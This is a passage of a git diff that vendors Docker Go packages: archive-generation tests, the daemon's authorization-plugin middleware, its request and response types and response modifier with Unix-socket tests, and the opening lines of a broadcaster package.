diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go
new file mode 100644
index 0000000000..46ab36697a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go
@@ -0,0 +1,98 @@
+package archive
+
+import (
+	"archive/tar"
+	"bytes"
+	"io"
+	"testing"
+)
+
+func TestGenerateEmptyFile(t *testing.T) {
+	archive, err := Generate("emptyFile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if archive == nil {
+		t.Fatal("The generated archive should not be nil.")
+	}
+
+	expectedFiles := [][]string{
+		{"emptyFile", ""},
+	}
+
+	tr := tar.NewReader(archive)
+	actualFiles := make([][]string, 0, 10)
+	i := 0
+	for {
+		hdr, err := tr.Next()
+		if err == io.EOF {
+			break
+		}
+		if err != nil {
+			t.Fatal(err)
+		}
+		buf := new(bytes.Buffer)
+		buf.ReadFrom(tr)
+		content := buf.String()
+		actualFiles = append(actualFiles, []string{hdr.Name, content})
+		i++
+	}
+	if len(actualFiles) != len(expectedFiles) {
+		t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles))
+	}
+	for i := 0; i < len(expectedFiles); i++ {
+		actual := actualFiles[i]
+		expected := expectedFiles[i]
+		if actual[0] != expected[0] {
+			t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], actual[0])
+		}
+		if actual[1] != expected[1] {
+			t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1])
+		}
+	}
+}
+
+func TestGenerateWithContent(t *testing.T) {
+	archive, err := Generate("file", "content")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if archive == nil {
+		t.Fatal("The generated archive should not be nil.")
+	}
+
+	expectedFiles := [][]string{
+		{"file", "content"},
+	}
+
+	tr := tar.NewReader(archive)
+	actualFiles := make([][]string, 0, 10)
+	i := 0
+	for {
+		hdr, err := tr.Next()
+		if err == io.EOF {
+			break
+		}
+		if err != nil {
+			t.Fatal(err)
+		}
+		buf := new(bytes.Buffer)
+		buf.ReadFrom(tr)
+		content := buf.String()
+		actualFiles = append(actualFiles, []string{hdr.Name, content})
+		i++
+	}
+	if len(actualFiles) != len(expectedFiles) {
+		t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles))
+	}
+	for i := 0; i < len(expectedFiles); i++ {
+		actual := actualFiles[i]
+		expected := expectedFiles[i]
+		if actual[0] != expected[0] {
+			t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], actual[0])
+		}
+		if actual[1] != expected[1] {
+			t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1])
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go
new file mode 100644
index 0000000000..05c75f1a67
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/api.go
@@ -0,0 +1,88 @@
+package authorization
+
+import (
+	"crypto/x509"
+	"encoding/json"
+	"encoding/pem"
+)
+
+const (
+	// AuthZApiRequest is the url for daemon request authorization
+	AuthZApiRequest = "AuthZPlugin.AuthZReq"
+
+	// AuthZApiResponse is the url for daemon response authorization
+	AuthZApiResponse = "AuthZPlugin.AuthZRes"
+
+	// AuthZApiImplements is the name of the interface all AuthZ plugins implement
+	AuthZApiImplements = "authz"
+)
+
+// PeerCertificate is a wrapper around x509.Certificate which provides a sane
+// enconding/decoding to/from PEM format and JSON.
+type PeerCertificate x509.Certificate
+
+// MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate.
+func (pc *PeerCertificate) MarshalJSON() ([]byte, error) {
+	b := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: pc.Raw})
+	return json.Marshal(b)
+}
+
+// UnmarshalJSON populates a new PeerCertificate struct from JSON data.
+func (pc *PeerCertificate) UnmarshalJSON(b []byte) error {
+	var buf []byte
+	if err := json.Unmarshal(b, &buf); err != nil {
+		return err
+	}
+	derBytes, _ := pem.Decode(buf)
+	c, err := x509.ParseCertificate(derBytes.Bytes)
+	if err != nil {
+		return err
+	}
+	*pc = PeerCertificate(*c)
+	return nil
+}
+
+// Request holds data required for authZ plugins
+type Request struct {
+	// User holds the user extracted by AuthN mechanism
+	User string `json:"User,omitempty"`
+
+	// UserAuthNMethod holds the mechanism used to extract user details (e.g., krb)
+	UserAuthNMethod string `json:"UserAuthNMethod,omitempty"`
+
+	// RequestMethod holds the HTTP method (GET/POST/PUT)
+	RequestMethod string `json:"RequestMethod,omitempty"`
+
+	// RequestUri holds the full HTTP uri (e.g., /v1.21/version)
+	RequestURI string `json:"RequestUri,omitempty"`
+
+	// RequestBody stores the raw request body sent to the docker daemon
+	RequestBody []byte `json:"RequestBody,omitempty"`
+
+	// RequestHeaders stores the raw request headers sent to the docker daemon
+	RequestHeaders map[string]string `json:"RequestHeaders,omitempty"`
+
+	// RequestPeerCertificates stores the request's TLS peer certificates in PEM format
+	RequestPeerCertificates []*PeerCertificate `json:"RequestPeerCertificates,omitempty"`
+
+	// ResponseStatusCode stores the status code returned from docker daemon
+	ResponseStatusCode int `json:"ResponseStatusCode,omitempty"`
+
+	// ResponseBody stores the raw response body sent from docker daemon
+	ResponseBody []byte `json:"ResponseBody,omitempty"`
+
+	// ResponseHeaders stores the response headers sent to the docker daemon
+	ResponseHeaders map[string]string `json:"ResponseHeaders,omitempty"`
+}
+
+// Response represents authZ plugin response
+type Response struct {
+	// Allow indicating whether the user is allowed or not
+	Allow bool `json:"Allow"`
+
+	// Msg stores the authorization message
+	Msg string `json:"Msg,omitempty"`
+
+	// Err stores a message in case there's an error
+	Err string `json:"Err,omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go
new file mode 100644
index 0000000000..dc9a9ae56f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go
@@ -0,0 +1,186 @@
+package authorization
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"io"
+	"net/http"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+const maxBodySize = 1048576 // 1MB
+
+// NewCtx creates new authZ context, it is used to store authorization information related to a specific docker
+// REST http session
+// A context provides two method:
+// Authenticate Request:
+// Call authZ plugins with current REST request and AuthN response
+// Request contains full HTTP packet sent to the docker daemon
+// https://docs.docker.com/engine/reference/api/
+//
+// Authenticate Response:
+// Call authZ plugins with full info about current REST request, REST response and AuthN response
+// The response from this method may contains content that overrides the daemon response
+// This allows authZ plugins to filter privileged content
+//
+// If multiple authZ plugins are specified, the block/allow decision is based on ANDing all plugin results
+// For response manipulation, the response from each plugin is piped between plugins. Plugin execution order
+// is determined according to daemon parameters
+func NewCtx(authZPlugins []Plugin, user, userAuthNMethod, requestMethod, requestURI string) *Ctx {
+	return &Ctx{
+		plugins:         authZPlugins,
+		user:            user,
+		userAuthNMethod: userAuthNMethod,
+		requestMethod:   requestMethod,
+		requestURI:      requestURI,
+	}
+}
+
+// Ctx stores a single request-response interaction context
+type Ctx struct {
+	user            string
+	userAuthNMethod string
+	requestMethod   string
+	requestURI      string
+	plugins         []Plugin
+	// authReq stores the cached request object for the current transaction
+	authReq *Request
+}
+
+// AuthZRequest authorized the request to the docker daemon using authZ plugins
+func (ctx *Ctx) AuthZRequest(w http.ResponseWriter, r *http.Request) error {
+	var body []byte
+	if sendBody(ctx.requestURI, r.Header) && r.ContentLength > 0 && r.ContentLength < maxBodySize {
+		var err error
+		body, r.Body, err = drainBody(r.Body)
+		if err != nil {
+			return err
+		}
+	}
+
+	var h bytes.Buffer
+	if err := r.Header.Write(&h); err != nil {
+		return err
+	}
+
+	ctx.authReq = &Request{
+		User:            ctx.user,
+		UserAuthNMethod: ctx.userAuthNMethod,
+		RequestMethod:   ctx.requestMethod,
+		RequestURI:      ctx.requestURI,
+		RequestBody:     body,
+		RequestHeaders:  headers(r.Header),
+	}
+
+	if r.TLS != nil {
+		for _, c := range r.TLS.PeerCertificates {
+			pc := PeerCertificate(*c)
+			ctx.authReq.RequestPeerCertificates = append(ctx.authReq.RequestPeerCertificates, &pc)
+		}
+	}
+
+	for _, plugin := range ctx.plugins {
+		logrus.Debugf("AuthZ request using plugin %s", plugin.Name())
+
+		authRes, err := plugin.AuthZRequest(ctx.authReq)
+		if err != nil {
+			return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err)
+		}
+
+		if !authRes.Allow {
+			return newAuthorizationError(plugin.Name(), authRes.Msg)
+		}
+	}
+
+	return nil
+}
+
+// AuthZResponse authorized and manipulates the response from docker daemon using authZ plugins
+func (ctx *Ctx) AuthZResponse(rm ResponseModifier, r *http.Request) error {
+	ctx.authReq.ResponseStatusCode = rm.StatusCode()
+	ctx.authReq.ResponseHeaders = headers(rm.Header())
+
+	if sendBody(ctx.requestURI, rm.Header()) {
+		ctx.authReq.ResponseBody = rm.RawBody()
+	}
+
+	for _, plugin := range ctx.plugins {
+		logrus.Debugf("AuthZ response using plugin %s", plugin.Name())
+
+		authRes, err := plugin.AuthZResponse(ctx.authReq)
+		if err != nil {
+			return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err)
+		}
+
+		if !authRes.Allow {
+			return newAuthorizationError(plugin.Name(), authRes.Msg)
+		}
+	}
+
+	rm.FlushAll()
+
+	return nil
+}
+
+// drainBody dump the body (if its length is less than 1MB) without modifying the request state
+func drainBody(body io.ReadCloser) ([]byte, io.ReadCloser, error) {
+	bufReader := bufio.NewReaderSize(body, maxBodySize)
+	newBody := ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() })
+
+	data, err := bufReader.Peek(maxBodySize)
+	// Body size exceeds max body size
+	if err == nil {
+		logrus.Warnf("Request body is larger than: '%d' skipping body", maxBodySize)
+		return nil, newBody, nil
+	}
+	// Body size is less than maximum size
+	if err == io.EOF {
+		return data, newBody, nil
+	}
+	// Unknown error
+	return nil, newBody, err
+}
+
+// sendBody returns true when request/response body should be sent to AuthZPlugin
+func sendBody(url string, header http.Header) bool {
+	// Skip body for auth endpoint
+	if strings.HasSuffix(url, "/auth") {
+		return false
+	}
+
+	// body is sent only for text or json messages
+	return header.Get("Content-Type") == "application/json"
+}
+
+// headers returns flatten version of the http headers excluding authorization
+func headers(header http.Header) map[string]string {
+	v := make(map[string]string, 0)
+	for k, values := range header {
+		// Skip authorization headers
+		if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") {
+			continue
+		}
+		for _, val := range values {
+			v[k] = val
+		}
+	}
+	return v
+}
+
+// authorizationError represents an authorization deny error
+type authorizationError struct {
+	error
+}
+
+// HTTPErrorStatusCode returns the authorization error status code (forbidden)
+func (e authorizationError) HTTPErrorStatusCode() int {
+	return http.StatusForbidden
+}
+
+func newAuthorizationError(plugin, msg string) authorizationError {
+	return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)}
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
new file mode 100644
index 0000000000..a787f3cd8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
@@ -0,0 +1,282 @@
+// +build !windows
+
+// TODO Windows: This uses a Unix socket for testing. This might be possible
+// to port to Windows using a named pipe instead.
+
+package authorization
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path"
+	"reflect"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/gorilla/mux"
+)
+
+const (
+	pluginAddress = "authz-test-plugin.sock"
+)
+
+func TestAuthZRequestPluginError(t *testing.T) {
+	server := authZPluginTestServer{t: t}
+	server.start()
+	defer server.stop()
+
+	authZPlugin := createTestPlugin(t)
+
+	request := Request{
+		User:           "user",
+		RequestBody:    []byte("sample body"),
+		RequestURI:     "www.authz.com/auth",
+		RequestMethod:  "GET",
+		RequestHeaders: map[string]string{"header": "value"},
+	}
+	server.replayResponse = Response{
+		Err: "an error",
+	}
+
+	actualResponse, err := authZPlugin.AuthZRequest(&request)
+	if err != nil {
+		t.Fatalf("Failed to authorize request %v", err)
+	}
+
+	if !reflect.DeepEqual(server.replayResponse, *actualResponse) {
+		t.Fatal("Response must be equal")
+	}
+	if !reflect.DeepEqual(request, server.recordedRequest) {
+		t.Fatal("Requests must be equal")
+	}
+}
+
+func TestAuthZRequestPlugin(t *testing.T) {
+	server := authZPluginTestServer{t: t}
+	server.start()
+	defer server.stop()
+
+	authZPlugin := createTestPlugin(t)
+
+	request := Request{
+		User:           "user",
+		RequestBody:    []byte("sample body"),
+		RequestURI:     "www.authz.com/auth",
+		RequestMethod:  "GET",
+		RequestHeaders: map[string]string{"header": "value"},
+	}
+	server.replayResponse = Response{
+		Allow: true,
+		Msg:   "Sample message",
+	}
+
+	actualResponse, err := authZPlugin.AuthZRequest(&request)
+	if err != nil {
+		t.Fatalf("Failed to authorize request %v", err)
+	}
+
+	if !reflect.DeepEqual(server.replayResponse, *actualResponse) {
+		t.Fatal("Response must be equal")
+	}
+	if !reflect.DeepEqual(request, server.recordedRequest) {
+		t.Fatal("Requests must be equal")
+	}
+}
+
+func TestAuthZResponsePlugin(t *testing.T) {
+	server := authZPluginTestServer{t: t}
+	server.start()
+	defer server.stop()
+
+	authZPlugin := createTestPlugin(t)
+
+	request := Request{
+		User:        "user",
+		RequestURI:  "someting.com/auth",
+		RequestBody: []byte("sample body"),
+	}
+	server.replayResponse = Response{
+		Allow: true,
+		Msg:   "Sample message",
+	}
+
+	actualResponse, err := authZPlugin.AuthZResponse(&request)
+	if err != nil {
+		t.Fatalf("Failed to authorize request %v", err)
+	}
+
+	if !reflect.DeepEqual(server.replayResponse, *actualResponse) {
+		t.Fatal("Response must be equal")
+	}
+	if !reflect.DeepEqual(request, server.recordedRequest) {
+		t.Fatal("Requests must be equal")
+	}
+}
+
+func TestResponseModifier(t *testing.T) {
+	r := httptest.NewRecorder()
+	m := NewResponseModifier(r)
+	m.Header().Set("h1", "v1")
+	m.Write([]byte("body"))
+	m.WriteHeader(http.StatusInternalServerError)
+
+	m.FlushAll()
+	if r.Header().Get("h1") != "v1" {
+		t.Fatalf("Header value must exists %s", r.Header().Get("h1"))
+	}
+	if !reflect.DeepEqual(r.Body.Bytes(), []byte("body")) {
+		t.Fatalf("Body value must exists %s", r.Body.Bytes())
+	}
+	if r.Code != http.StatusInternalServerError {
+		t.Fatalf("Status code must be correct %d", r.Code)
+	}
+}
+
+func TestDrainBody(t *testing.T) {
+	tests := []struct {
+		length             int // length is the message length send to drainBody
+		expectedBodyLength int // expectedBodyLength is the expected body length after drainBody is called
+	}{
+		{10, 10}, // Small message size
+		{maxBodySize - 1, maxBodySize - 1}, // Max message size
+		{maxBodySize * 2, 0},               // Large message size (skip copying body)
+
+	}
+
+	for _, test := range tests {
+		msg := strings.Repeat("a", test.length)
+		body, closer, err := drainBody(ioutil.NopCloser(bytes.NewReader([]byte(msg))))
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(body) != test.expectedBodyLength {
+			t.Fatalf("Body must be copied, actual length: '%d'", len(body))
+		}
+		if closer == nil {
+			t.Fatal("Closer must not be nil")
+		}
+		modified, err := ioutil.ReadAll(closer)
+		if err != nil {
+			t.Fatalf("Error must not be nil: '%v'", err)
+		}
+		if len(modified) != len(msg) {
+			t.Fatalf("Result should not be truncated. Original length: '%d', new length: '%d'", len(msg), len(modified))
+		}
+	}
+}
+
+func TestResponseModifierOverride(t *testing.T) {
+	r := httptest.NewRecorder()
+	m := NewResponseModifier(r)
+	m.Header().Set("h1", "v1")
+	m.Write([]byte("body"))
+	m.WriteHeader(http.StatusInternalServerError)
+
+	overrideHeader := make(http.Header)
+	overrideHeader.Add("h1", "v2")
+	overrideHeaderBytes, err := json.Marshal(overrideHeader)
+	if err != nil {
+		t.Fatalf("override header failed %v", err)
+	}
+
+	m.OverrideHeader(overrideHeaderBytes)
+	m.OverrideBody([]byte("override body"))
+	m.OverrideStatusCode(http.StatusNotFound)
+	m.FlushAll()
+	if r.Header().Get("h1") != "v2" {
+		t.Fatalf("Header value must exists %s", r.Header().Get("h1"))
+	}
+	if !reflect.DeepEqual(r.Body.Bytes(), []byte("override body")) {
+		t.Fatalf("Body value must exists %s", r.Body.Bytes())
+	}
+	if r.Code != http.StatusNotFound {
+		t.Fatalf("Status code must be correct %d", r.Code)
+	}
+}
+
+// createTestPlugin creates a new sample authorization plugin
+func createTestPlugin(t *testing.T) *authorizationPlugin {
+	pwd, err := os.Getwd()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client, err := plugins.NewClient("unix:///"+path.Join(pwd, pluginAddress), &tlsconfig.Options{InsecureSkipVerify: true})
+	if err != nil {
+		t.Fatalf("Failed to create client %v", err)
+	}
+
+	return &authorizationPlugin{name: "plugin", plugin: client}
+}
+
+// AuthZPluginTestServer is a simple server that implements the authZ plugin interface
+type authZPluginTestServer struct {
+	listener net.Listener
+	t        *testing.T
+	// request stores the request sent from the daemon to the plugin
+	recordedRequest Request
+	// response stores the response sent from the plugin to the daemon
+	replayResponse Response
+	server         *httptest.Server
+}
+
+// start starts the test server that implements the plugin
+func (t *authZPluginTestServer) start() {
+	r := mux.NewRouter()
+	l, err := net.Listen("unix", pluginAddress)
+	if err != nil {
+		t.t.Fatal(err)
+	}
+	t.listener = l
+	r.HandleFunc("/Plugin.Activate", t.activate)
+	r.HandleFunc("/"+AuthZApiRequest, t.auth)
+	r.HandleFunc("/"+AuthZApiResponse, t.auth)
+	t.server = &httptest.Server{
+		Listener: l,
+		Config: &http.Server{
+			Handler: r,
+			Addr:    pluginAddress,
+		},
+	}
+	t.server.Start()
+}
+
+// stop stops the test server that implements the plugin
+func (t *authZPluginTestServer) stop() {
+	t.server.Close()
+	os.Remove(pluginAddress)
+	if t.listener != nil {
+		t.listener.Close()
+	}
+}
+
+// auth is a used to record/replay the authentication api messages
+func (t *authZPluginTestServer) auth(w http.ResponseWriter, r *http.Request) {
+	t.recordedRequest = Request{}
+	body, err := ioutil.ReadAll(r.Body)
+	if err != nil {
+		t.t.Fatal(err)
+	}
+	r.Body.Close()
+	json.Unmarshal(body, &t.recordedRequest)
+	b, err := json.Marshal(t.replayResponse)
+	if err != nil {
+		t.t.Fatal(err)
+	}
+	w.Write(b)
+}
+
+func (t *authZPluginTestServer) activate(w http.ResponseWriter, r *http.Request) {
+	b, err := json.Marshal(plugins.Manifest{Implements: []string{AuthZApiImplements}})
+	if err != nil {
+		t.t.Fatal(err)
+	}
+	w.Write(b)
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go
new file mode 100644
index 0000000000..52890dd360
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go
@@ -0,0 +1,84 @@
+package authorization
+
+import (
+	"net/http"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/plugingetter"
+	"golang.org/x/net/context"
+)
+
+// Middleware uses a list of plugins to
+// handle authorization in the API requests.
+type Middleware struct {
+	mu      sync.Mutex
+	plugins []Plugin
+}
+
+// NewMiddleware creates a new Middleware
+// with a slice of plugins names.
+func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware {
+	SetPluginGetter(pg)
+	return &Middleware{
+		plugins: newPlugins(names),
+	}
+}
+
+// SetPlugins sets the plugin used for authorization
+func (m *Middleware) SetPlugins(names []string) {
+	m.mu.Lock()
+	m.plugins = newPlugins(names)
+	m.mu.Unlock()
+}
+
+// WrapHandler returns a new handler function wrapping the previous one in the request chain.
+func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+
+		m.mu.Lock()
+		plugins := m.plugins
+		m.mu.Unlock()
+		if len(plugins) == 0 {
+			return handler(ctx, w, r, vars)
+		}
+
+		user := ""
+		userAuthNMethod := ""
+
+		// Default authorization using existing TLS connection credentials
+		// FIXME: Non trivial authorization mechanisms (such as advanced certificate validations, kerberos support
+		// and ldap) will be extracted using AuthN feature, which is tracked under:
+		// https://github.com/docker/docker/pull/20883
+		if r.TLS != nil && len(r.TLS.PeerCertificates) > 0 {
+			user = r.TLS.PeerCertificates[0].Subject.CommonName
+			userAuthNMethod = "TLS"
+		}
+
+		authCtx := NewCtx(plugins, user, userAuthNMethod, r.Method, r.RequestURI)
+
+		if err := authCtx.AuthZRequest(w, r); err != nil {
+			logrus.Errorf("AuthZRequest for %s %s returned error: %s", r.Method, r.RequestURI, err)
+			return err
+		}
+
+		rw := NewResponseModifier(w)
+
+		var errD error
+
+		if errD = handler(ctx, rw, r, vars); errD != nil {
+			logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD)
+		}
+
+		if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil {
+			logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err)
+			return err
+		}
+
+		if errD != nil {
+			return errD
+		}
+
+		return nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go
new file mode 100644
index 0000000000..4b1c71bd4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go
@@ -0,0 +1,112 @@
+package authorization
+
+import (
+	"sync"
+
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+)
+
+// Plugin allows third party plugins to authorize requests and responses
+// in the context of docker API
+type Plugin interface {
+	// Name returns the registered plugin name
+	Name() string
+
+	// AuthZRequest authorizes the request from the client to the daemon
+	AuthZRequest(*Request) (*Response, error)
+
+	// AuthZResponse authorizes the response from the daemon to the client
+	AuthZResponse(*Request) (*Response, error)
+}
+
+// newPlugins constructs and initializes the authorization plugins based on plugin names
+func newPlugins(names []string) []Plugin {
+	plugins := []Plugin{}
+	pluginsMap := make(map[string]struct{})
+	for _, name := range names {
+		if _, ok := pluginsMap[name]; ok {
+			continue
+		}
+		pluginsMap[name] = struct{}{}
+		plugins = append(plugins, newAuthorizationPlugin(name))
+	}
+	return plugins
+}
+
+var getter plugingetter.PluginGetter
+
+// SetPluginGetter sets the plugingetter
+func SetPluginGetter(pg plugingetter.PluginGetter) {
+	getter = pg
+}
+
+// GetPluginGetter gets the plugingetter
+func GetPluginGetter() plugingetter.PluginGetter {
+	return getter
+}
+
+// authorizationPlugin is an internal adapter to docker plugin system
+type authorizationPlugin struct {
+	plugin *plugins.Client
+	name   string
+	once   sync.Once
+}
+
+func newAuthorizationPlugin(name string) Plugin {
+	return &authorizationPlugin{name: name}
+}
+
+func (a *authorizationPlugin) Name() string {
+	return a.name
+}
+
+func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) {
+	if err := a.initPlugin(); err != nil {
+		return nil, err
+	}
+
+	authRes := &Response{}
+	if err := a.plugin.Call(AuthZApiRequest, authReq, authRes); err != nil {
+		return nil, err
+	}
+
+	return authRes, nil
+}
+
+func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error) {
+	if err := a.initPlugin(); err != nil {
+		return nil, err
+	}
+
+	authRes := &Response{}
+	if err := a.plugin.Call(AuthZApiResponse, authReq, authRes); err != nil {
+		return nil, err
+	}
+
+	return authRes, nil
+}
+
+// initPlugin initializes the authorization plugin if needed
+func (a *authorizationPlugin) initPlugin() error {
+	// Lazy loading of plugins
+	var err error
+	a.once.Do(func() {
+		if a.plugin == nil {
+			var plugin plugingetter.CompatPlugin
+			var e error
+
+			if pg := GetPluginGetter(); pg != nil {
+				plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP)
+			} else {
+				plugin, e = plugins.Get(a.name, AuthZApiImplements)
+			}
+			if e != nil {
+				err = e
+				return
+			}
+			a.plugin = plugin.Client()
+		}
+	})
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go
new file mode 100644
index 0000000000..129bf2f417
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/response.go
@@ -0,0 +1,203 @@
+package authorization
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"net"
+	"net/http"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// ResponseModifier allows authorization plugins to read and modify the content of the http.response
+type ResponseModifier interface {
+	http.ResponseWriter
+	http.Flusher
+	http.CloseNotifier
+
+	// RawBody returns the current http content
+	RawBody() []byte
+
+	// RawHeaders returns the current content of the http headers
+	RawHeaders() ([]byte, error)
+
+	// StatusCode returns the current status code
+	StatusCode() int
+
+	// OverrideBody replaces the body of the HTTP reply
+	OverrideBody(b []byte)
+
+	// OverrideHeader replaces the headers of the HTTP reply
+	OverrideHeader(b []byte) error
+
+	// OverrideStatusCode replaces the status code of the HTTP reply
+	OverrideStatusCode(statusCode int)
+
+	// FlushAll flushes all data to the HTTP response
+	FlushAll() error
+
+	// Hijacked indicates the response has been hijacked by the Docker daemon
+	Hijacked() bool
+}
+
+// NewResponseModifier creates a wrapper to an http.ResponseWriter to allow inspecting and modifying the content
+func NewResponseModifier(rw http.ResponseWriter) ResponseModifier {
+	return &responseModifier{rw: rw, header: make(http.Header)}
+}
+
+// responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore
+// the http request/response from docker daemon
+type responseModifier struct {
+	// The original response writer
+	rw http.ResponseWriter
+	// body holds the response body
+	body []byte
+	// header holds the response header
+	header http.Header
+	// statusCode holds the response status code
+	statusCode int
+	// hijacked indicates the request has been hijacked
+	hijacked bool
+}
+
+func (rm *responseModifier) Hijacked() bool {
+	return rm.hijacked
+}
+
+// WriterHeader stores the http status code
+func (rm *responseModifier) WriteHeader(s int) {
+
+	// Use original request if hijacked
+	if rm.hijacked {
+		rm.rw.WriteHeader(s)
+		return
+	}
+
+	rm.statusCode = s
+}
+
+// Header returns the internal http header
+func (rm *responseModifier) Header() http.Header {
+
+	// Use original header if hijacked
+	if rm.hijacked {
+		return rm.rw.Header()
+	}
+
+	return rm.header
+}
+
+// StatusCode returns the http status code
+func (rm *responseModifier) StatusCode() int {
+	return rm.statusCode
+}
+
+// OverrideBody replaces the body of the HTTP response
+func (rm *responseModifier) OverrideBody(b []byte) {
+	rm.body = b
+}
+
+// OverrideStatusCode replaces the status code of the HTTP response
+func (rm *responseModifier) OverrideStatusCode(statusCode int) {
+	rm.statusCode = statusCode
+}
+
+// OverrideHeader replaces the headers of the HTTP response
+func (rm *responseModifier) OverrideHeader(b []byte) error {
+	header := http.Header{}
+	if err := json.Unmarshal(b, &header); err != nil {
+		return err
+	}
+	rm.header = header
+	return nil
+}
+
+// Write stores the byte array inside content
+func (rm *responseModifier) Write(b []byte) (int, error) {
+
+	if rm.hijacked {
+		return rm.rw.Write(b)
+	}
+
+	rm.body = append(rm.body, b...)
+	return len(b), nil
+}
+
+// Body returns the response body
+func (rm *responseModifier) RawBody() []byte {
+	return rm.body
+}
+
+func (rm *responseModifier) RawHeaders() ([]byte, error) {
+	var b bytes.Buffer
+	if err := rm.header.Write(&b); err != nil {
+		return nil, err
+	}
+	return b.Bytes(), nil
+}
+
+// Hijack returns the internal connection of the wrapped http.ResponseWriter
+func (rm *responseModifier) Hijack() (net.Conn, *bufio.ReadWriter, error) {
+
+	rm.hijacked = true
+	rm.FlushAll()
+
+	hijacker, ok := rm.rw.(http.Hijacker)
+	if !ok {
+		return nil, nil, fmt.Errorf("Internal response writer doesn't support the Hijacker interface")
+	}
+	return hijacker.Hijack()
+}
+
+// CloseNotify uses the internal close notify API of the wrapped http.ResponseWriter
+func (rm *responseModifier) CloseNotify() <-chan bool {
+	closeNotifier, ok := rm.rw.(http.CloseNotifier)
+	if !ok {
+		logrus.Error("Internal response writer doesn't support the CloseNotifier interface")
+		return nil
+	}
+	return closeNotifier.CloseNotify()
+}
+
+// Flush uses the internal flush API of the wrapped http.ResponseWriter
+func (rm *responseModifier) Flush() {
+	flusher, ok := rm.rw.(http.Flusher)
+	if !ok {
+		logrus.Error("Internal response writer doesn't support the Flusher interface")
+		return
+	}
+
+	rm.FlushAll()
+	flusher.Flush()
+}
+
+// FlushAll flushes all data to the HTTP response
+func (rm *responseModifier) FlushAll() error {
+	// Copy the header
+	for k, vv := range rm.header {
+		for _, v := range vv {
+			rm.rw.Header().Add(k, v)
+		}
+	}
+
+	// Copy the status code
+	// Also WriteHeader needs to be done after all the headers
+	// have been copied (above).
+	if rm.statusCode > 0 {
+		rm.rw.WriteHeader(rm.statusCode)
+	}
+
+	var err error
+	if len(rm.body) > 0 {
+		// Write body
+		_, err = rm.rw.Write(rm.body)
+	}
+
+	// Clean previous data
+	rm.body = nil
+	rm.statusCode = 0
+	rm.header = http.Header{}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
new file mode 100644
index 0000000000..784d65d6fe
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
@@ -0,0 +1,49 @@
+package broadcaster
+
+import (
+	"io"
+	"sync"
+)
+
+// Unbuffered accumulates multiple io.WriteCloser by stream.
+type Unbuffered struct {
+	mu      sync.Mutex
